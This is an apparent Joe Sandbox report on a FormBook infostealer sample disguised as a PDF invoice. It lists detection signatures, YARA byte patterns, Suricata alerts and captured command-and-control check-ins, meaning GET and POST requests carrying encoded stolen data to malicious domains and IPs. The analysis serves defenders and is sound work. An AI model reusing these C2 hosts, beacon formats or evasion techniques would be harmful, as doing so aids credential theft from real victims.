Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ORIGINAL INVOICE COAU7230734298.pdf.exe

Overview

General Information

Sample name:ORIGINAL INVOICE COAU7230734298.pdf.exe
Analysis ID:1523775
MD5:7d3ee1a73d9fbef171c785801ffcaff2
SHA1:2ad9a95c9038e4d61c6d9cbee63746454454d502
SHA256:1897d47010a97079de62b957827fbecbdb4690ead4a51417fa6f1dccfc19f6c5
Tags:exeuser-ngokoptmp
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • ORIGINAL INVOICE COAU7230734298.pdf.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe" MD5: 7D3EE1A73D9FBEF171C785801FFCAFF2)
    • ORIGINAL INVOICE COAU7230734298.pdf.exe (PID: 7428 cmdline: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe" MD5: 7D3EE1A73D9FBEF171C785801FFCAFF2)
      • fFUkGixTNm.exe (PID: 3492 cmdline: "C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • RpcPing.exe (PID: 7964 cmdline: "C:\Windows\SysWOW64\RpcPing.exe" MD5: F7DD5764D96A988F0CF9DD4813751473)
          • fFUkGixTNm.exe (PID: 4248 cmdline: "C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8104 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x27c3e:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xff0d:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2b9d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13c9f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2ed03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16fd2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2df03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x161d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Suspicious Double Extension File Execution
            Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe", CommandLine: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe", CommandLine|base64offset|contains: N !, Image: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe, NewProcessName: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe, OriginalFileName: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe", ProcessId: 7276, ProcessName: ORIGINAL INVOICE COAU7230734298.pdf.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-02T02:06:28.163634+020028554641A Network Trojan was detected192.168.2.45682585.159.66.9380TCP
            2024-10-02T02:06:30.710433+020028554641A Network Trojan was detected192.168.2.45682685.159.66.9380TCP
            2024-10-02T02:06:33.257293+020028554641A Network Trojan was detected192.168.2.45682785.159.66.9380TCP
            2024-10-02T02:06:41.993230+020028554641A Network Trojan was detected192.168.2.456829185.106.176.20480TCP
            2024-10-02T02:06:44.549267+020028554641A Network Trojan was detected192.168.2.456830185.106.176.20480TCP
            2024-10-02T02:06:47.089054+020028554641A Network Trojan was detected192.168.2.456831185.106.176.20480TCP
            2024-10-02T02:06:56.491974+020028554641A Network Trojan was detected192.168.2.45683352.223.13.4180TCP
            2024-10-02T02:06:58.051773+020028554641A Network Trojan was detected192.168.2.45683452.223.13.4180TCP
            2024-10-02T02:07:00.520885+020028554641A Network Trojan was detected192.168.2.45683552.223.13.4180TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exeVirustotal: Detection: 38%Perma Link
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exeReversingLabs: Detection: 28%
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exeJoe Sandbox ML: detected
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: Hx.pdbSHA256 source: ORIGINAL INVOICE COAU7230734298.pdf.exe
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fFUkGixTNm.exe, 00000007.00000002.2930068881.0000000000B3E000.00000002.00000001.01000000.0000000C.sdmp, fFUkGixTNm.exe, 00000009.00000002.2929589735.0000000000B3E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2247703529.000000000382F000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2245830854.0000000003672000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdbGCTL source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930259689.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe, ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, RpcPing.exe, 00000008.00000003.2247703529.000000000382F000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2245830854.0000000003672000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930259689.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Hx.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_0327C000 FindFirstFileW,FindNextFileW,FindClose,8_2_0327C000
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 4x nop then xor eax, eax8_2_03269B70
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 4x nop then mov ebx, 00000004h8_2_03D304DE
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 4x nop then pop edi9_2_058C2FA0
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 4x nop then xor eax, eax9_2_058C7839
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 4x nop then pop edi9_2_058D2ACE

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56830 -> 185.106.176.204:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56834 -> 52.223.13.41:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56825 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56835 -> 52.223.13.41:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56827 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56833 -> 52.223.13.41:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56829 -> 185.106.176.204:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56831 -> 185.106.176.204:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56826 -> 85.159.66.93:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.kartal-nakliyat.xyz
            Source: Joe Sandbox ViewIP Address: 52.223.13.41 52.223.13.41
            Source: Joe Sandbox ViewASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
            Source: Joe Sandbox ViewASN Name: AS_LYREG3FR AS_LYREG3FR
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /pyhp/?5lFl=AhoHbVV8w8Fhov&-L=acxrSkAeFAn+c73u09IRBa4IAQi5A1z7ZI6dwDB31LKHDk9U9aCGF5xgW/dUXTEZ5HtK9ZQYYeKWJ5O00arwvLVjsQ/IAPNwWm6am1xvCJN+TihMUZXrkzI= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.yippie.worldUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /n8ew/?-L=YrE+HYcRTJ/OeXavXWmi0WsMxqp/Qj1TC8eaJJaWkX68lODBlWDwQ18bVJjKs/Cf7bGV7reziuqKeQkAFQFGt8cheHN72b7qcqvkvKEYShiE16kKqs7vQFQ=&5lFl=AhoHbVV8w8Fhov HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.kartal-nakliyat.xyzUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /c6mm/?-L=605lt7jFydoU7JlJmLmlR3MPZVvrIrf93PMCsOoFpo6XmjZ52y5IXJzTkSO6xf5k8c4UHFGKgBYSwhM4U1695pryhegOugHUsMzW6k0CmFF9ZZ6niG5/hdc=&5lFl=AhoHbVV8w8Fhov HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.sidqwdf.funUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /sfpe/?-L=sfhD9ka1f7Zl+qNrDMj9KQZnnhuUSPArAKQ60GHQT7zGoqr1MFveBg7/TQ1R28eaU1mFht6SOS1vYGyl5v5sWa+Vgmcag1rYJ6bZGh78paZg7QH5mUVjdRg=&5lFl=AhoHbVV8w8Fhov HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.resellnexa.shopUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
            Source: global trafficDNS traffic detected: DNS query: www.yippie.world
            Source: global trafficDNS traffic detected: DNS query: www.kartal-nakliyat.xyz
            Source: global trafficDNS traffic detected: DNS query: www.sidqwdf.fun
            Source: global trafficDNS traffic detected: DNS query: www.resellnexa.shop
            Source: unknownHTTP traffic detected: POST /n8ew/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usConnection: closeCache-Control: max-age=0Content-Length: 199Content-Type: application/x-www-form-urlencodedHost: www.kartal-nakliyat.xyzOrigin: http://www.kartal-nakliyat.xyzReferer: http://www.kartal-nakliyat.xyz/n8ew/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)Data Raw: 2d 4c 3d 56 70 73 65 45 75 30 4c 65 37 53 74 58 78 4b 66 4e 68 69 6b 35 6e 78 2b 2b 5a 67 49 52 53 78 43 53 64 69 4f 52 38 32 56 76 6d 47 48 76 65 4f 33 70 42 54 37 52 58 63 2b 63 39 76 54 69 6f 4f 45 78 70 2f 55 6d 4c 69 4b 71 35 71 69 64 56 46 56 45 67 64 62 34 4c 51 74 4c 44 6b 6d 37 4b 50 46 55 71 32 62 31 37 45 4d 62 67 79 6b 77 35 38 42 74 4b 2f 33 49 51 32 75 54 50 31 52 56 7a 38 2b 47 63 44 6e 48 54 6c 4a 73 32 71 64 41 31 62 4f 6a 77 75 57 39 4c 69 46 33 47 50 6b 32 4a 6b 67 72 59 2f 6a 59 5a 64 68 35 6f 75 2b 6d 61 45 61 55 4e 71 4d 41 78 79 4c 6b 67 43 64 7a 51 4f 6b 72 51 3d 3d Data Ascii: -L=VpseEu0Le7StXxKfNhik5nx++ZgIRSxCSdiOR82VvmGHveO3pBT7RXc+c9vTioOExp/UmLiKq5qidVFVEgdb4LQtLDkm7KPFUq2b17EMbgykw58BtK/3IQ2uTP1RVz8+GcDnHTlJs2qdA1bOjwuW9LiF3GPk2JkgrY/jYZdh5ou+maEaUNqMAxyLkgCdzQOkrQ==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 02 Oct 2024 00:06:34 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-10-02T00:06:39.8601907Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 02 Oct 2024 00:06:41 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 02 Oct 2024 00:06:44 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 02 Oct 2024 00:06:46 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 